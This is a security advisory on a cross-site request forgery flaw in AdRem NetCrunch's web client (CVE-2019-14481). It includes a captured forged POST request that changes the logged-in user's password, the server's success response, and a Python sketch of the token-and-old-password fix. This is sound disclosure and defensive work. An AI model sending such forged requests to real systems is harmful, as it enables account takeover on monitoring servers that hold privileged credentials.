################################################################################
#
# COMPASS SECURITY ADVISORY
# https://compass-security.com/en/research/advisories
#
################################################################################
#
# Product:  NetCrunch
# Vendor:   AdRem
# CSNC ID:  CSNC-2019-016
# CVE ID:   CVE-2019-14481
# Subject:  Cross-Site Request Forgery (CSRF)
# Risk:     High
# Effect:   Remotely exploitable
# Authors:  Thierry Viaccoz
#           Sylvain Heiniger
#           Fabio Poloni
# Date:     26.07.2019
#
################################################################################

Introduction:
-------------

NetCrunch [1] is a so-called "agentless" monitoring solution developed by AdRem.
It allows system administrators to monitor, visualize and get alerts from many
kinds of systems in their network. The solution consists of a server and a fat
client (also called console), as well as a web client.

Due to its architecture, the monitoring server is a critical system, as it holds
credentials, most of the time privileged, for all monitored systems.

Compass Security identified a Cross-Site Request Forgery (CSRF) vulnerability in
the AdRem NetCrunch web client. Successful exploitation requires a logged-in user
to open a malicious page and leads to account takeover.

Affected:
---------

Initially vulnerable:

* AdRem NetCrunch 10.6.0.4587

Not vulnerable:

* AdRem NetCrunch 11.0.0.5282 (old password required to change it)

Still vulnerable:

* AdRem NetCrunch 11.0.0.5282 (still no general anti-CSRF mechanism)

No other version was tested, but it is believed that older versions are also
vulnerable.

Technical Description:
----------------------

Non-idempotent requests (i.e. requests that change data or trigger actions on
the server) are not protected against Cross-Site Request Forgery attacks. An
attacker can cause the victim's browser to execute undesired actions in the web
application through crafted requests.
Such requests can be executed by luring the logged-in user onto a malicious
website or by making them click a prepared link. Since it is not required to
enter the old password when changing it, an attacker can use this vulnerability
to set the password of the logged-in user to an arbitrary value.

Use the following proof-of-concept generated by Burp Suite:

Request triggered by the proof-of-concept above, changing the logged-in user's
password to "compass":

POST /Options.json?requestId=4 HTTP/1.1
Host: some-server
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 46
Origin: null
Cookie: WASessionId=2125729872
Connection: close

newPassword=compass&newPasswordConfirm=compass

Response showing that the request was accepted:

HTTP/1.1 200 OK
Connection: close
Content-Type: text/json; charset=UTF-8
Content-Length: 17
Cache-control: no-cache
Date: Wed, 31 Jul 2019 19:41:17 GMT
Pragma: no-cache
Server: AdRem WebApp Server

{ success: true }

Workaround / Fix:
-----------------

Make requests unique by including an element which cannot be predicted by an
attacker. This CSRF token should have the following properties:

- Generated by the server
- Unique per session
- Secure random
- Transported as POST parameter or HTTP header

When receiving a request, the server needs to validate the token. If the token
is incorrect, missing, or does not match the user session, the request should be
dropped.

In addition, the user should have to provide the old password in order to
change it.

As a NetCrunch customer, update your installation to the latest version to
receive the fix.
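The following is an added illustration of the fix described above, written for this advisory; it is not AdRem's code and does not reflect how the NetCrunch web server is implemented. It models a hardened handler for the password-change request (POST /Options.json) that (a) binds a server-generated, secure-random, per-session CSRF token to the WASessionId session and rejects any request whose token is missing or does not match, and (b) requires the old password before accepting a new one. The in-memory session store, the `csrfToken` form field, the `X-CSRF-Token` header and the `oldPassword` field are assumptions made for the example; `newPassword`, `newPasswordConfirm` and `WASessionId` are the names from the captured request.

```python
import hmac
import secrets
from typing import Dict, Optional
from urllib.parse import parse_qs

# Assumption for this example: sessions live in a simple in-memory dict keyed
# by the WASessionId cookie value. Passwords are kept in plaintext only to keep
# the example short; a real server stores a salted hash.
SESSIONS: Dict[str, dict] = {}


def create_session(user: str, password: str) -> str:
    """Create a session and bind a fresh anti-CSRF token to it.

    The token is generated by the server, unique per session and drawn from
    a CSPRNG, which are the three properties the fix section asks for.
    """
    session_id = secrets.token_hex(16)
    SESSIONS[session_id] = {
        "user": user,
        "password": password,
        "csrf_token": secrets.token_urlsafe(32),
    }
    return session_id


def csrf_token_for(session_id: str) -> str:
    """Token the server embeds in its own pages/forms for this session."""
    return SESSIONS[session_id]["csrf_token"]


def validate_csrf(session_id: Optional[str], submitted: Optional[str]) -> bool:
    """True only if the submitted token matches the one bound to this session."""
    session = SESSIONS.get(session_id or "")
    if session is None or not submitted:
        return False
    # Constant-time comparison so the token cannot be guessed byte by byte.
    return hmac.compare_digest(session["csrf_token"].encode(), submitted.encode())


def parse_form(body: str) -> Dict[str, str]:
    """Decode an application/x-www-form-urlencoded body into a flat dict."""
    return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}


def handle_options_request(cookies: Dict[str, str], body: str,
                           headers: Dict[str, str]) -> dict:
    """Hardened handler for the password-change request.

    Order of checks: CSRF token first (drop the request outright), then the
    old-password requirement, then the usual confirmation match.
    """
    form = parse_form(body)
    session_id = cookies.get("WASessionId")
    # The token may travel as a POST parameter or as an HTTP header
    # (names are assumptions for this example).
    token = form.get("csrfToken") or headers.get("X-CSRF-Token")
    if not validate_csrf(session_id, token):
        return {"success": False, "error": "invalid or missing CSRF token"}

    session = SESSIONS[session_id]
    old = form.get("oldPassword")
    if old is None or not hmac.compare_digest(old.encode(), session["password"].encode()):
        return {"success": False, "error": "old password required"}

    new = form.get("newPassword")
    if not new or new != form.get("newPasswordConfirm"):
        return {"success": False, "error": "new passwords missing or do not match"}

    session["password"] = new
    return {"success": True}


if __name__ == "__main__":
    sid = create_session("admin", "initial-secret")
    # Constructed replay of the body from the advisory's captured request:
    # a cross-origin form post carries the session cookie but no token.
    forged = "newPassword=compass&newPasswordConfirm=compass"
    print(handle_options_request({"WASessionId": sid}, forged, {}))
    # A request issued by the application's own page carries the token and
    # the old password, and is accepted.
    legit = (f"csrfToken={csrf_token_for(sid)}&oldPassword=initial-secret"
             "&newPassword=compass&newPasswordConfirm=compass")
    print(handle_options_request({"WASessionId": sid}, legit, {}))
```

Replaying the advisory's captured body through this handler yields `{"success": False, ...}` instead of the `{ success: true }` the vulnerable server returned, because the browser-attached cookie alone no longer authorises the change; the token check covers every state-changing endpoint, and the old-password check additionally limits the damage of any single forged or hijacked request to the password-change function.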
Timeline:
---------

2019-05-23: Discovery by Thierry Viaccoz, Sylvain Heiniger and Fabio Poloni
2019-08-01: Assigned CVE-2019-14481
2019-08-29: Initial vendor notification
2020-12-08: Coordinated public disclosure date

References:
-----------

[1] https://www.adremsoft.com/